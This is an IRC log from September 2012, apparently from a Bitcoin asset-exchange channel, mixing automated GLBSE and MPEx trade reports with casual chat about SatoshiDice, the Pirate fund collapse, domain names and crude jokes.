06:15:15 that's a lame fact. who doesn't snort those? Sep 01 06:15:26 lol Sep 01 06:15:53 but you do bring an interestinf point, i wonder if cats like semen Sep 01 06:16:12 so what's the naming scheme on sdice? "lessthan X" what does it even mean? Sep 01 06:16:22 my cat loves semen Sep 01 06:16:25 anyhoo Sep 01 06:16:41 ya know, i prolly know what it means Sep 01 06:16:43 smickles huh ? Sep 01 06:17:04 mm, i have no ideea hopw that thing actually works. Sep 01 06:19:53 [GLBSE] [FUTUREFUND] 1 @ 0.00012189 BTC [+] Sep 01 06:21:36 [GLBSE] [OBSI.HRPT] 1 @ 0.104975 BTC [-] Sep 01 06:21:58 exahash do you actually have 1 exahash by now ? :D Sep 01 06:22:59 mircea_popescu: it takes an hmac of the publicly know secret and your txid, then the first so many characters of that are converted (hex->decimal) the decimal value has to be less than X to wint Sep 01 06:23:06 *win Sep 01 06:23:27 and there are various addresses for each X value Sep 01 06:23:33 smickles have you been gaming sd? Sep 01 06:23:51 jcpham: i did send a bit to lessthan 1 once Sep 01 06:24:03 oh yes i tested it Sep 01 06:24:18 i was wondering if you were running thousands of tx through Sep 01 06:24:20 o i see. Sep 01 06:24:25 did you martangel (or whatever it's called)? Sep 01 06:24:27 about what i thought Sep 01 06:24:31 martingale Sep 01 06:24:32 nope Sep 01 06:24:34 jesus your spelling! Sep 01 06:24:54 i used to say i was not a gambler Sep 01 06:24:55 mircea_popescu: i thought it was a different word Sep 01 06:25:01 but obviously i have issues Sep 01 06:25:02 i didn't realize it was a bird Sep 01 06:25:09 so i've rephrased it Sep 01 06:25:14 i do not play games of chance Sep 01 06:25:34 jcpham: you play poker then maybe? Sep 01 06:25:51 with rel cards and alcohol. sure Sep 01 06:25:56 :D Sep 01 06:25:59 sexy chicks on standby Sep 01 06:26:07 if we ever find ourselves together Sep 01 06:26:12 i know what we'll do Sep 01 06:26:15 jcpham it's very nice to play stud/hold'em in the harem Sep 01 06:26:23 jcpham: do you like scotch? Sep 01 06:26:27 play WITH the girls./ Sep 01 06:26:32 maybe next year we'll have our own vegas meetup Sep 01 06:26:38 or screw vegas Sep 01 06:26:51 i like tropical Sep 01 06:27:00 don't screw vegas you'll get the clap. Sep 01 06:27:07 lol Sep 01 06:27:36 jcpham: my relative know a good place in puerto vallarta Sep 01 06:27:42 *relatives Sep 01 06:28:29 http://upload.wikimedia.org/wikipedia/commons/c/cc/PenicillinPSAedit.jpg Sep 01 06:28:43 i used to love costa rica casinos. Sep 01 06:28:48 its been awhile since i was able to do the "hop in the car and drive for a few weeks" trip Sep 01 06:28:50 very laid back. Sep 01 06:29:23 someplace european or tropical where i can drive the shit out of a car would be nice Sep 01 06:30:52 lol @ xss comment Sep 01 06:35:23 [GLBSE] [GIGAMINING] 1 @ 0.8575 BTC [-] Sep 01 06:35:24 [MPEX] [F.GIGA.ETF] 9556 @ 0.00087256 = 8.3382 BTC [-] Sep 01 06:35:25 [MPEX] [F.GIGA.ETF] 7544 @ 0.00087252 = 6.5823 BTC [-] Sep 01 06:36:31 [GLBSE] [GSDPT] 345 @ 0.0030011 = 1.0354 BTC [+] Sep 01 06:36:33 [GLBSE] [GSDPT] 655 @ 0.003001 = 1.9657 BTC [-] Sep 01 06:37:10 [GLBSE] [GSDPT] 338 @ 0.003001 = 1.0143 BTC [-] Sep 01 06:37:42 [GLBSE] [BITBOND] 10 @ 0.4695 = 4.695 BTC [+] Sep 01 06:38:35 [GLBSE] [GIGAMINING] 1 @ 0.8576 BTC [+] Sep 01 06:42:51 aite well... gnite all. Sep 01 06:42:56 [GLBSE] [PUREMINING] 2 @ 0.0917 = 0.1834 BTC [+] Sep 01 06:43:17 [GLBSE] [MERGEDMINING] 1 @ 0.085 BTC [-] Sep 01 06:43:30 nn Sep 01 06:44:13 kakobreklaa: http://bit.ly/RMjqah is down **** BEGIN LOGGING AT Sat Sep 1 18:13:48 2012 Sep 01 18:16:27 http://www.theregister.co.uk/2012/08/31/critical_flaw_found_in_patched_java/ Sep 01 18:16:37 ATTENTION : patched java is STILL VULNERABLE Sep 01 18:16:42 get the fuck rid of that thing. Sep 01 18:17:36 [GLBSE] [DMC] 1 @ 0.0679 BTC [+] Sep 01 18:21:17 [GLBSE] [BLUECHIP] 8 @ 0.1 = 0.8 BTC Sep 01 18:32:52 [MPEX] [S.MPOE] 46900 @ 0.00038587 = 18.0973 BTC [+] Sep 01 18:37:33 [MPEX] [S.MPOE] 200 @ 0.00038666 = 0.0773 BTC [+] Sep 01 18:37:35 [MPEX] [S.MPOE] 17400 @ 0.00038713 = 6.7361 BTC [+] Sep 01 18:38:32 [GLBSE] [PUREMINING] 4 @ 0.09399 = 0.376 BTC [+] Sep 01 18:41:37 [GLBSE] [FPGAMINING] 1 @ 0.84959899 BTC [+] Sep 01 18:42:19 [GLBSE] [BDT] 1 @ 1.04 BTC [+] Sep 01 18:42:57 [GLBSE] [FDBF] 1 @ 0.14999 BTC [-] Sep 01 18:43:57 [GLBSE] [YABMC] 3 @ 0.1179 = 0.3537 BTC [+] Sep 01 18:44:30 ;;ticker Sep 01 18:44:31 Best bid: 9.922, Best ask: 9.95, Bid-ask spread: 0.02800, Last trade: 9.922, 24 hour volume: 58909, 24 hour low: 9.66, 24 hour high: 10.42 Sep 01 18:45:15 "the girl" is ruffling feathers on -otc Sep 01 18:45:49 not really Sep 01 18:45:54 haha Sep 01 18:45:59 but she can ruffle my feathers anytime Sep 01 18:46:22 lol Sep 01 18:46:34 she's a feather ruffler is she. Sep 01 18:46:37 uhh Sep 01 18:46:37 http://www.encyclopediabitcoinica.com/wiki/Mircea_Popescu Sep 01 18:46:46 lol Sep 01 18:47:20 https://bitcointalk.org/index.php?topic=105100.msg1150576#msg1150576 Sep 01 18:47:20 You can show that to your PR girl, Mr. Popescu. Sep 01 18:47:20 i read it meanwhile. pretty funnay :D Sep 01 18:47:20 She handled it well, though: https://bitcointalk.org/index.php?topic=105100.msg1150685#msg1150685 Sep 01 18:47:20 pm the guy tell him we want him on irc Sep 01 18:47:20 his talents are wasted in that swamp. Sep 01 18:47:20 lol Sep 01 18:47:20 I might just do that. Sep 01 18:47:20 and she doesn't seem to me to have handled it too well. Sep 01 18:47:20 sorta like a wanna-be mpoe-pr w/o the zip. Sep 01 18:47:25 if anyone want to join in on this effort ... Sep 01 18:47:28 that guy belongs here. Sep 01 18:48:20 he has questions Sep 01 18:48:24 she's got answers Sep 01 18:48:44 and the old folks wished them well Sep 01 18:51:46 [GLBSE] [ASICMINER] 1 @ 0.1099 BTC [-] Sep 01 18:51:59 the guy that the cool kids are calling a db? Sep 01 18:53:04 they're the 99%. Sep 01 18:53:33 [GLBSE] [NYAN.C] 1 @ 0.78 BTC [+] Sep 01 18:54:00 mircea_popescu: what? you mean 99% as in not an outlaw motorcycle gang? Sep 01 18:54:13 yeah. Sep 01 18:54:23 they ain;t got da choppars. Sep 01 18:54:33 http://en.wikipedia.org/wiki/Outlaw_motorcycle_club#One_percenter Sep 01 18:55:20 https://bitcointalk.org/index.php?topic=105065.0 Sep 01 18:55:29 AHAHAHA this is so funny. so. SO! LET ME GET THIS STRAIGHT! Sep 01 18:55:35 noob solicits interest for asset rating service idea Sep 01 18:55:48 forum says he should start new exchange with quality audits which'd charge extra to use. Sep 01 18:55:48 lol. Sep 01 18:56:04 jesus god i'll die laughing. Sep 01 18:56:13 mircea_popescu: you didn't make the named list "I'm thinking about an independent rating service that tracks the securities traded on GLBSE, Cryptostocks and any others." Sep 01 18:56:25 guess why. Sep 01 18:57:14 i hope to not be put on any lists Sep 01 18:57:58 you're already on a list. Sep 01 18:58:08 i have it right here on my desk : pirate scam operators. Sep 01 18:58:52 oh i see Sep 01 18:58:55 yes that Sep 01 18:59:20 rearrange the words like this: pirate operators, scammed Sep 01 18:59:25 make more sense now Sep 01 18:59:25 yeah. Sep 01 18:59:32 did you see anything yet ? Sep 01 18:59:34 jcpham is on my sexynaughty list Sep 01 18:59:35 no Sep 01 18:59:37 (superfluous question, huh) Sep 01 18:59:55 i still had planned to rpivately confirm Sep 01 18:59:58 but alas, no Sep 01 19:00:07 myeah. Sep 01 19:00:13 ehy! but the interest Sep 01 19:00:17 facepalm. Sep 01 19:00:29 some people still have hope :/ Sep 01 19:00:37 not me tho Sep 01 19:00:38 [MPEX] [S.MPOE] 200 @ 0.00038671 = 0.0773 BTC [-] Sep 01 19:00:39 i've made hundreds of btc in interest Sep 01 19:00:40 [MPEX] [S.MPOE] 25500 @ 0.00038597 = 9.8422 BTC [-] Sep 01 19:00:44 smickles this is why these things suck so bad : it ruins people emotionally. Sep 01 19:01:05 i'm not emotionally ruined myself because like i said overall i'm ahead Sep 01 19:01:10 i'd like to be more ahead Sep 01 19:01:21 [GLBSE] [ASICMINER] 2 @ 0.1099 = 0.2198 BTC [-] Sep 01 19:01:26 felt too good to be true Sep 01 19:01:54 let's all hope for the best though Sep 01 19:02:33 i didn't mean you personally, j7ust saying. Sep 01 19:02:40 a number of people got it pretty rough. Sep 01 19:03:26 yes Sep 01 19:03:31 very rough Sep 01 19:03:39 i made one referral and feel bad for it Sep 01 19:03:52 it was not my idea, thankfully though Sep 01 19:04:21 i would feel exceptionally bad if i had recruited people for this monumental fail Sep 01 19:05:04 [GLBSE] [GIGAMINING] 2 @ 0.8579 = 1.7158 BTC [+] Sep 01 19:05:04 [GLBSE] [GIGAMINING] 8 @ 0.85799 = 6.8639 BTC [+] Sep 01 19:05:06 [GLBSE] [GIGAMINING] 2 @ 0.858 = 1.716 BTC [+] Sep 01 19:05:50 yeah. Sep 01 19:06:41 [MPEX] [S.MPOE] 200 @ 0.0003866 = 0.0773 BTC [+] Sep 01 19:06:42 [MPEX] [S.MPOE] 14200 @ 0.00038713 = 5.4972 BTC [+] Sep 01 19:06:44 [MPEX] [S.MPOE] 21900 @ 0.00038794 = 8.4959 BTC [+] Sep 01 19:06:45 [MPEX] [S.MPOE] 35600 @ 0.00038924 = 13.8569 BTC [+] Sep 01 19:06:46 [MPEX] [S.MPOE] 29300 @ 0.00038975 = 11.4197 BTC [+] Sep 01 19:06:47 [MPEX] [S.MPOE] 46822 @ 0.00039163 = 18.3369 BTC [+] Sep 01 19:06:48 [MPEX] [S.MPOE] 25500 @ 0.00039164 = 9.9868 BTC [+] Sep 01 19:06:49 [MPEX] [S.MPOE] 48977 @ 0.00039178 = 19.1882 BTC [+] Sep 01 19:06:50 [MPEX] [S.MPOE] 53090 @ 0.00039551 = 20.9976 BTC [+] Sep 01 19:06:51 [MPEX] [S.MPOE] 17909 @ 0.00039795 = 7.1269 BTC [+] Sep 01 19:06:52 [MPEX] [S.MPOE] 18700 @ 0.00039796 = 7.4419 BTC [+] Sep 01 19:06:53 [MPEX] [S.MPOE] 44700 @ 0.00039875 = 17.8241 BTC [+] Sep 01 19:06:54 [MPEX] [S.MPOE] 12900 @ 0.00039882 = 5.1448 BTC [+] Sep 01 19:06:55 [MPEX] [S.MPOE] 13509 @ 0.00039891 = 5.3889 BTC [+] Sep 01 19:06:57 [MPEX] [S.MPOE] 54100 @ 0.0003991 = 21.5913 BTC [+] Sep 01 19:06:58 [MPEX] [S.MPOE] 9256 @ 0.00039957 = 3.6984 BTC [+] Sep 01 19:06:58 [MPEX] [S.MPOE] 14310 @ 0.00040116 = 5.7406 BTC [+] Sep 01 19:06:59 [MPEX] [S.MPOE] 34100 @ 0.00040121 = 13.6813 BTC [+] Sep 01 19:07:00 [MPEX] [S.MPOE] 54600 @ 0.0004015 = 21.9219 BTC [+] Sep 01 19:07:01 [MPEX] [S.MPOE] 9000 @ 0.0004016 = 3.6144 BTC [+] Sep 01 19:07:02 [MPEX] [S.MPOE] 48100 @ 0.0004016 = 19.317 BTC [+] Sep 01 19:07:03 [MPEX] [S.MPOE] 50200 @ 0.0004018 = 20.1704 BTC [+] Sep 01 19:07:04 [MPEX] [S.MPOE] 59400 @ 0.00040188 = 23.8717 BTC [+] Sep 01 19:07:05 [MPEX] [S.MPOE] 25000 @ 0.0004038 = 10.095 BTC [+] Sep 01 19:07:06 [MPEX] [S.MPOE] 55168 @ 0.00040781 = 22.4981 BTC [+] Sep 01 19:07:07 [MPEX] [S.MPOE] 20500 @ 0.00041578 = 8.5235 BTC [+] Sep 01 19:07:07 0_o Sep 01 19:07:08 [MPEX] [S.MPOE] 182959 @ 0.00042 = 76.8428 BTC [+] Sep 01 19:07:18 o hey, moving up in da world. Sep 01 19:07:26 mircea_popescu: you need to post losses more often ;) Sep 01 19:07:29 lmao Sep 01 19:07:41 yeah, you know strangely... a lot of people took it better than gains Sep 01 19:07:44 it's very odd to me. Sep 01 19:07:57 twas like... o, losses ?! *grin* Sep 01 19:08:12 ;;google wealthiest people in romania Sep 01 19:08:12 Capital Top 300 wealthiest men in Romania - Wikipedia, the free ...: ; The Richest Person In Romania ‹ The Richest People In The World ...: ; Top 10 Richest People of Romania - Famouswhy: (1 more message) Sep 01 19:08:15 naw, i know what it is Sep 01 19:08:45 smickles they're mostly a bunch of grafters. one guy that ran off with the socialist state's foreign accounts, Sep 01 19:08:48 http://en.wikipedia.org/wiki/Mircea_Popa Sep 01 19:08:57 anyway Sep 01 19:08:58 one guy who made a bp knockoff, one guy with a cocacola ripoff etc. Sep 01 19:09:13 no real businessmen in romania yet. Sep 01 19:09:26 Except for yourself, of course. Sep 01 19:09:45 mircea_popescu: it's that person you called an 'insider trader', he' like I gotta make sure this mp keep runnehn mpex, so i can scam him some more Sep 01 19:10:04 lol Sep 01 19:10:12 im not a billionaire yet, so. Sep 01 19:10:35 smickles : at least two accounts involved. Sep 01 19:10:58 [GLBSE] [FPGAMINING] 1 @ 0.84959899 BTC [+] Sep 01 19:10:59 [GLBSE] [FPGAMINING] 2 @ 0.84969899 = 1.6994 BTC [+] Sep 01 19:11:00 mircea_popescu: you just need to have 10 million to be on that list Sep 01 19:11:16 ;;calc 10000000/[ticker --last] Sep 01 19:11:16 996015.936255 Sep 01 19:11:30 almost bitcoin million!\ Sep 01 19:11:38 well, so i guess maybe i make it next year. Sep 01 19:11:43 :D Sep 01 19:14:17 [MPEX] [O.BTCUSD.C100T] 23 @ 0.19 = 4.37 BTC [+] Sep 01 19:14:19 [MPEX] [O.BTCUSD.C100T] 977 @ 0.19384805 = 189.3895 BTC [+] Sep 01 19:14:46 [MPEX] [O.BTCUSD.P110T] 1000 @ 0.27463545 = 274.6355 BTC [+] Sep 01 19:18:47 http://polimedia.us/dtng/c/src/134651631427.jpg this looks like a party. Sep 01 19:21:12 [GLBSE] [JAH] 12 @ 0.15 = 1.8 BTC [-] Sep 01 19:27:40 [GLBSE] [OBSI.HRPT] 4 @ 0.1009999 = 0.404 BTC [-] Sep 01 19:36:01 [MPEX] [S.DICE] 500 @ 0.0033 = 1.65 BTC [-] Sep 01 19:38:39 [GLBSE] [OBSI.HRPT] 1 @ 0.1009999 BTC [-] Sep 01 19:39:43 i wunder if talkin gher does it Sep 01 19:39:46 [GLBSE] [OBSI.HRPT] 1 @ 0.1009999 BTC [-] Sep 01 19:40:02 ;;ping Sep 01 19:40:03 pong Sep 01 19:40:25 bong Sep 01 19:40:54 lol Sep 01 19:41:19 :D Sep 01 19:51:29 my wife is rplacing one word of various movie titles with "bacon"; "how to succede in business without even bacon" Sep 01 19:52:00 Arnold Schwartzenigger in: Total Bacon Sep 01 19:52:17 "back to bacon future" Sep 01 19:52:54 Six Degrees of Kevin..... Bacon Sep 01 19:53:49 Oh sory thats not a movie Sep 01 19:55:27 it's a bacon, bacon, bacon, bacon, bacon, bacon world Sep 01 19:57:31 [GLBSE] [HYDRO.BONDS] 1 @ 1.59879 BTC [-] Sep 01 19:59:14 [MPEX] [F.GIGA.ETF] 15700 @ 0.00089383 = 14.0331 BTC [+] Sep 01 19:59:27 [GLBSE] [BTC-MINING] 1 @ 0.96999 BTC [+] Sep 01 19:59:54 [GLBSE] [OBSI.HRPT] 1 @ 0.1009999 BTC [-] Sep 01 20:00:33 [GLBSE] [PUREASIC] 1 @ 0.8 BTC [+] Sep 01 20:01:01 [GLBSE] [OBSI.HRPT] 24 @ 0.1009999 = 2.424 BTC [-] Sep 01 20:02:50 mmm bacon Sep 01 20:03:02 i think btcpantry when i hear bacon Sep 01 20:04:23 [GLBSE] [ASICMINER] 1 @ 0.10989999 BTC [-] Sep 01 20:06:55 "all dogs go to bacon" Sep 01 20:07:27 *candied Sep 01 20:11:33 "there will be bacon" Sep 01 20:18:42 "the devil wears bacon" Sep 01 20:19:15 i know what you did last bacon Sep 01 20:19:39 sounds like a pretty cool gal, rocket scientist with a solid love of bacon. Sep 01 20:20:51 damn you all! ... as if i haven't put on enuf weight eating btc-popcoin ... now i crave btc-bacon *grr* Sep 01 20:21:15 btcon Sep 01 20:21:16 [GLBSE] [FPGAMINING] 5 @ 0.8001 = 4.0005 BTC [-] Sep 01 20:21:17 [GLBSE] [FPGAMINING] 22 @ 0.8 = 17.6 BTC [-] Sep 01 20:21:21 and now theres ANOTHER domain ill have to buy Sep 01 20:22:02 grrr y u all feed my domain adddiction Sep 01 20:22:25 ;;internet whois btcon.com Sep 01 20:22:31 btcon.com is clienttransferprohibited, registered 14-feb-2003, updated 15-feb-2012, and expires 14-feb-2013. Sep 01 20:22:45 "i know what bacon did last summer" Sep 01 20:22:48 ;;internet whois btc-bacon.com Sep 01 20:22:49 Error: I couldn't find such a domain. Sep 01 20:22:54 woohho Sep 01 20:23:07 nomnomnom Sep 01 20:23:26 ;;internet whois mostofmany.com Sep 01 20:23:28 mostofmany.com is clienttransferprohibited, registered 26-sep-2011, updated 12-jun-2012, and expires 26-sep-2012. Sep 01 20:23:47 oh my expiration comming up Sep 01 20:24:00 ;;internet whois polimedia.us Sep 01 20:24:01 polimedia.us is ok, registered Tue Oct 02 06:08:32 GMT 2007, updated Fri Dec 09 06:51:39 GMT 2011, and expires Thu Oct 01 23:59:59 GMT 2015. Sep 01 20:24:06 ;;internet whois hewhodieswiththemostcoinswins.com Sep 01 20:24:06 dun dun dun Sep 01 20:24:08 Error: I couldn't find such a domain. Sep 01 20:25:12 [GLBSE] [PUREMINING] 1 @ 0.0938 BTC [-] Sep 01 20:25:24 [MPEX] [S.BVPS] 20 @ 0.00339511 = 0.0679 BTC [-] Sep 01 20:25:25 [MPEX] [S.BVPS] 359 @ 0.00340302 = 1.2217 BTC [+] Sep 01 20:28:34 mwahahahah /me just bought btc-bacon.com Sep 01 20:28:45 scroo u all you enablers you Sep 01 20:29:29 [GLBSE] [YABMC] 8 @ 0.1179 = 0.9432 BTC [+] Sep 01 20:30:25 you got btcorn ? Sep 01 20:30:51 hehehe :D Sep 01 20:31:14 working on it Sep 01 20:31:42 btcool ? Sep 01 20:32:46 ohh stoppit Sep 01 20:32:57 not squat on dns Sep 01 20:32:58 :P Sep 01 20:33:05 lol Sep 01 20:37:43 [GLBSE] [YABMC] 7 @ 0.1179 = 0.8253 BTC [+] Sep 01 20:39:48 [GLBSE] [DMC] 4 @ 0.0679 = 0.2716 BTC [+] Sep 01 20:42:29 [GLBSE] [GMVT-BOT] 2 @ 0.14 = 0.28 BTC [+] Sep 01 20:42:56 [MPEX] [F.GIGA.ETF] 315 @ 0.00089383 = 0.2816 BTC [+] Sep 01 20:42:58 [MPEX] [F.GIGA.ETF] 3785 @ 0.00089487 = 3.3871 BTC [+] Sep 01 20:44:10 http://polimedia.us/dtng/c/src/134565878556.jpg how many azn chicks you need to boil water ? Sep 01 20:45:43 [GLBSE] [PUREMINING] 1 @ 0.0938 BTC [-] Sep 01 20:47:36 [GLBSE] [GIGAMINING] 9 @ 0.858 = 7.722 BTC [+] Sep 01 20:53:54 the bacon is amazing from btcpantry Sep 01 20:54:10 peanut butter plus bread Sep 01 20:54:44 jcpham i know they lost the site, what's the new one ? Sep 01 20:54:55 [GLBSE] [GIGAMINING] 2 @ 0.859 = 1.718 BTC [+] Sep 01 20:55:40 [GLBSE] [YABMC] 1 @ 0.1179 BTC [+] Sep 01 20:55:50 [GLBSE] [TYGRR.BOND-P] 1 @ 0.33 BTC [+] Sep 01 20:56:20 [GLBSE] [BITBOND] 1 @ 0.4694 BTC [-] Sep 01 21:01:47 [GLBSE] [BFLS.RIG] 4 @ 0.9485954 = 3.7944 BTC [-] Sep 01 21:02:29 [GLBSE] [GIGAMINING] 5 @ 0.859 = 4.295 BTC [+] Sep 01 21:05:10 [GLBSE] [OBSI.HRPT] 1 @ 0.1009999 BTC [-] Sep 01 21:05:12 [GLBSE] [PAJKA.BOND] 3 @ 0.079 = 0.237 BTC [+] Sep 01 21:05:46 [GLBSE] [PUREMINING] 3 @ 0.0938 = 0.2814 BTC [-] Sep 01 21:06:09 [GLBSE] [OBSI.HRPT] 1 @ 0.1009999 BTC [-] Sep 01 21:06:58 ;;topic Sep 01 21:06:58 Bitcoin asset exchanges: GLBSE https://glbse.com || MPEx http://polimedia.us/mpex || CST https://cryptostocks.com || ICBIT https://icbit.se || list bot commands: !help || Streaming trades only: #bitcoin-assets-trades || a biased message: http://smpake.com/ || Net Chart: http://bit.ly/RMjqah Sep 01 21:07:07 hm Sep 01 21:07:14 MrTiggr, net chart is down Sep 01 21:08:22 mircea_popescu http://btcpantry.com/ Sep 01 21:08:31 o i see. Sep 01 21:10:37 [GLBSE] [JLP-BMD] 5 @ 0.0995 = 0.4975 BTC [-] Sep 01 21:11:18 [GLBSE] [JLP-BMD] 1 @ 0.0995 BTC [-] Sep 01 21:15:10 [MPEX] [S.MPOE] 14200 @ 0.00039781 = 5.6489 BTC [-] Sep 01 21:16:34 [GLBSE] [OBSI.HRPT] 49 @ 0.1009999 = 4.949 BTC [-] Sep 01 21:16:44 [GLBSE] [FUTUREFUND] 10 @ 0.000121 = 0.0012 BTC [-] Sep 01 21:17:20 [GLBSE] [GOLD] 2 @ 0.00989 = 0.0198 BTC [+] Sep 01 21:17:55 [GLBSE] [MMM] 4 @ 0.889 = 3.556 BTC [+] Sep 01 21:18:26 [GLBSE] [FUTUREFUND] 94 @ 0.00012 = 0.0113 BTC [-] Sep 01 21:18:50 [GLBSE] [OBSI.HRPT] 1 @ 0.1009999 BTC [-] Sep 01 21:19:00 [GLBSE] [FUTUREFUND] 5 @ 0.000121 = 0.0006 BTC [+] Sep 01 21:20:39 [MPEX] [F.GIGA.ETF] 5515 @ 0.00089487 = 4.9352 BTC [+] Sep 01 21:20:40 [MPEX] [F.GIGA.ETF] 4685 @ 0.00089526 = 4.1943 BTC [+] Sep 01 21:20:58 [GLBSE] [FOO.PPPPT] 1 @ 0.35 BTC [+] Sep 01 21:22:11 [GLBSE] [MMM] 4 @ 0.89 = 3.56 BTC [+] Sep 01 21:22:59 [GLBSE] [MOVETO.FUND] 9 @ 1.19739575 = 10.7766 BTC [-] Sep 01 21:23:58 [GLBSE] [MOVETO.FUND] 50 @ 1.19739576 = 59.8698 BTC [+] Sep 01 21:25:48 [GLBSE] [JLP-BMD] 2 @ 0.0995 = 0.199 BTC [-] Sep 01 21:25:50 [GLBSE] [JLP-BMD] 1 @ 0.09999 BTC [+] Sep 01 21:28:40 [GLBSE] [MOVETO.FUND] 9 @ 1.19739576 = 10.7766 BTC [+] Sep 01 21:32:34 If we removed all the pirate crap from the market listing, BTC-Mining would go up to the 26th to the 16th position! Sep 01 21:32:44 Shows how popular pirate was/ Sep 01 21:33:06 Well I guess I'm technically still in the top 20 after all. Sep 01 21:33:14 [GLBSE] [OBSI.HRPT] 1 @ 0.1009999 BTC [-] Sep 01 21:35:08 [MPEX] [S.MPOE] 5300 @ 0.00039781 = 2.1084 BTC [-] Sep 01 21:40:30 hm Sep 01 21:40:56 anyone remember if zipconf had published any info on the fees they would have Sep 01 21:41:25 the owens thing ? Sep 01 21:41:30 yes Sep 01 21:41:32 can't say that i do Sep 01 21:41:35 I did look into it long time ago but never found any info Sep 01 21:43:26 i think it never got to the point of such concreteness. Sep 01 21:43:32 lol Sep 01 21:43:36 sad. Sep 01 21:44:37 [GLBSE] [PUREMINING] 2 @ 0.0872 = 0.1744 BTC [-] Sep 01 21:44:38 [GLBSE] [PUREMINING] 5 @ 0.087 = 0.435 BTC [-] Sep 01 21:44:39 [GLBSE] [PUREMINING] 7 @ 0.0853 = 0.5971 BTC [-] Sep 01 21:44:40 [GLBSE] [PUREMINING] 47 @ 0.0852 = 4.0044 BTC [-] Sep 01 21:44:42 [GLBSE] [PUREMINING] 5 @ 0.0851 = 0.4255 BTC [-] Sep 01 21:44:43 [GLBSE] [PUREMINING] 5 @ 0.0851 = 0.4255 BTC [-] Sep 01 21:44:44 [GLBSE] [PUREMINING] 3 @ 0.085 = 0.255 BTC [-] Sep 01 21:44:45 [GLBSE] [PUREMINING] 34 @ 0.0842 = 2.8628 BTC [-] Sep 01 21:45:29 [GLBSE] [KRAKEN] 8 @ 0.01 = 0.08 BTC [+] Sep 01 21:47:03 [GLBSE] [OBSI.HRPT] 55 @ 0.1009999 = 5.555 BTC [-] Sep 01 21:48:25 [GLBSE] [PAJKA.BOND] 1 @ 0.079 BTC [+] Sep 01 21:48:36 [GLBSE] [OBSI.HRPT] 34 @ 0.10388999 = 3.5323 BTC [+] Sep 01 21:54:00 [GLBSE] [FUTUREFUND] 100 @ 0.000121 = 0.0121 BTC [+] Sep 01 21:55:01 [GLBSE] [FDBF] 4 @ 0.14999 = 0.6 BTC [-] Sep 01 21:55:02 [GLBSE] [FDBF] 5 @ 0.149999 = 0.75 BTC [+] Sep 01 21:55:03 [GLBSE] [FDBF] 1 @ 0.1499999 BTC [+] Sep 01 21:55:46 [GLBSE] [BITCOINRS] 10 @ 0.050999 = 0.51 BTC [+] Sep 01 21:57:39 [GLBSE] [BDT] 1 @ 1.04 BTC [+] Sep 01 22:03:59 [GLBSE] [ASICMINER] 8 @ 0.10989999 = 0.8792 BTC [-] Sep 01 22:05:39 [21:02:56] btc-e.com: no btc-e code api Sep 01 22:05:39 [21:03:07] Diler.si: yeah i see Sep 01 22:05:39 [21:03:13] Diler.si: can you add it? Sep 01 22:05:39 [21:05:15] btc-e.com: ok Sep 01 22:05:42 well that was easy. Sep 01 22:07:48 lol Sep 01 22:08:02 [21:06:53] Diler.si: alright Sep 01 22:08:02 [21:07:03] Diler.si: ill add option for btc-e Sep 01 22:08:02 [21:07:06 | Edited 21:07:14] Diler.si: when its done Sep 01 22:08:02 [21:07:32] btc-e.com: tomorrow Sep 01 22:08:03 lol Sep 01 22:08:16 crazy russians. Sep 01 22:08:51 [MPEX] [S.MPOE] 44904 @ 0.00039683 = 17.8193 BTC [-] Sep 01 22:09:44 [MPEX] [F.GIGA.ETF] 8808 @ 0.00089526 = 7.8855 BTC [+] Sep 01 22:09:45 [MPEX] [F.GIGA.ETF] 6582 @ 0.00089789 = 5.9099 BTC [+] Sep 01 22:09:47 [MPEX] [F.GIGA.ETF] 6210 @ 0.00090136 = 5.5974 BTC [+] Sep 01 22:14:04 [GLBSE] [BDK.BND] 2 @ 0.1009 = 0.2018 BTC [-] Sep 01 22:14:06 [GLBSE] [BDK.BND] 10 @ 0.1 = 1 BTC [-] Sep 01 22:14:07 [GLBSE] [BDK.BND] 1 @ 0.0999 BTC [-] Sep 01 22:16:03 [GLBSE] [TEEK.B] 1 @ 0.9797 BTC [+] Sep 01 22:16:05 [GLBSE] [TEEK.B] 2 @ 0.97989 = 1.9598 BTC [+] Sep 01 22:16:22 [GLBSE] [YABMC] 1 @ 0.1178 BTC [-] Sep 01 22:16:24 [GLBSE] [YABMC] 2 @ 0.112 = 0.224 BTC [-] Sep 01 22:16:25 [GLBSE] [YABMC] 35 @ 0.1115 = 3.9025 BTC [-] Sep 01 22:16:26 [GLBSE] [YABMC] 54 @ 0.1114 = 6.0156 BTC [-] Sep 01 22:18:05 [GLBSE] [OBSI.HRPT] 16 @ 0.10388999 = 1.6622 BTC [+] Sep 01 22:18:07 [GLBSE] [OBSI.HRPT] 19 @ 0.1038999 = 1.9741 BTC [+] Sep 01 22:18:08 [GLBSE] [OBSI.HRPT] 5 @ 0.10389999 = 0.5195 BTC [+] Sep 01 22:20:33 [GLBSE] [BFLS.FUTURES] 1 @ 0.9 BTC [+] Sep 01 22:25:54 [MPEX] [S.BVPS] 200 @ 0.00346504 = 0.693 BTC [+] Sep 01 22:27:14 [GLBSE] [ARS] 50 @ 0.0155 = 0.775 BTC [+] Sep 01 22:29:00 [GLBSE] [GMVT-BOT] 1 @ 0.14 BTC [+] Sep 01 22:36:04 !pl GMVT-BOT 0.1 Sep 01 22:36:05 Requesting data from GLBSE (might take a while). Sep 01 22:36:34 GMVT-BOT [1@0.1BTC] paid: 0.00711271 BTC. Last price: 0.14 BTC. Capital gain: 0.04 BTC. Total: 0.04711271 BTC. (47.1%) Sep 01 22:39:13 [MPEX] [F.GIGA.ETF] 3090 @ 0.00090136 = 2.7852 BTC [+] Sep 01 22:39:14 [MPEX] [F.GIGA.ETF] 5911 @ 0.00090253 = 5.3349 BTC [+] Sep 01 22:39:16 [MPEX] [F.GIGA.ETF] 5799 @ 0.00090321 = 5.2377 BTC [+] Sep 01 22:42:32 [GLBSE] [PUREMINING] 31 @ 0.0937 = 2.9047 BTC [+] Sep 01 22:43:53 PsychoticBoy: do you end up doing well at that game earlier? Sep 01 22:45:58 [GLBSE] [ASICMINER] 1 @ 0.1097999 BTC [-] Sep 01 22:48:55 [GLBSE] [GIGAMINING] 5 @ 0.8521 = 4.2605 BTC [-] Sep 01 23:04:32 anyone seen nefario lately? Sep 01 23:05:53 was here a few days ago. Sep 01 23:06:03 he hasnt fixed the inbox issue yet Sep 01 23:06:11 wasn't he moving from china ? Sep 01 23:06:43 to where? Sep 01 23:06:50 uh i dunno Sep 01 23:10:52 [GLBSE] [MOVETO.FUND] 3 @ 1.15396 = 3.4619 BTC [-] Sep 01 23:10:53 [GLBSE] 